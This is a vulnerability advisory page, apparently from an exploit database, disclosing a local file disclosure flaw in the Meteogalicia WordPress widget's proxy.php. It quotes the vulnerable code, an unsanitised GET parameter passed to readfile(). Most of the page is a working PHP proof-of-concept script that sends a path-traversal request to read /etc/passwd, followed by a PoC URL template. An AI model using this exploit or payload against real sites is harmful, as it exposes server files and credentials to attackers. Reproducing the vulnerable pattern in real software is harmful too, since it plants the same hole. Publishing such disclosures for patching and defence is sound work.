Meteogalicia Wordpress Widget - Local File Disclosure

2016.09.11
Credit: Mohit Amn
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

" Meteogalicia Wordpress Widget - Local File Disclosure " An attacker can exploit this issue to download Important files on the site Source : https://github.com/zetxek/Meteogalicia-Wordpress-Widget =========== Vulnerable page : =========== Meteogalicia-Wordpress-Widget/meteogalicia/proxy.php ========== Vulnerable Code : ========== <?php /* Note */ $url = 'site.....='.$_GET['id']; readfile($url) ?> ========= POC Exploit : ======== <?php # Author : Shahab Shamsi # Title : Meteogalicia Wordpress Widget - Local File Disclosure # Date : 08.September.2016 # Email : info@securityman.org # Vendor : https://github.com/zetxek/Meteogalicia-Wordpress-Widget # Category : Webapps $target = $argv[1]; $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_URL, "http://localhost/wordpress/meteogalicia/proxy.php?id=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"); curl_setopt($ch, CURLOPT_HTTPGET, 1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); curl_setopt($ch, CURLOPT_TIMEOUT, 3); curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3); curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3); $buf = curl_exec ($ch); curl_close($ch); unset($ch); echo $buf; /* Contact Me : Telegram : @R4DIK4L Email : info@securityman.org WebSilte : WwW.MohitAmn.Org Tnx : AmirHossein Farjad Curl By : R@DIK@L */ ?> =========== POC URL: =========== http://localhost/patch/meteogalicia/proxy.php?id=[LFD]


Vote for this issue:
0%
100%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top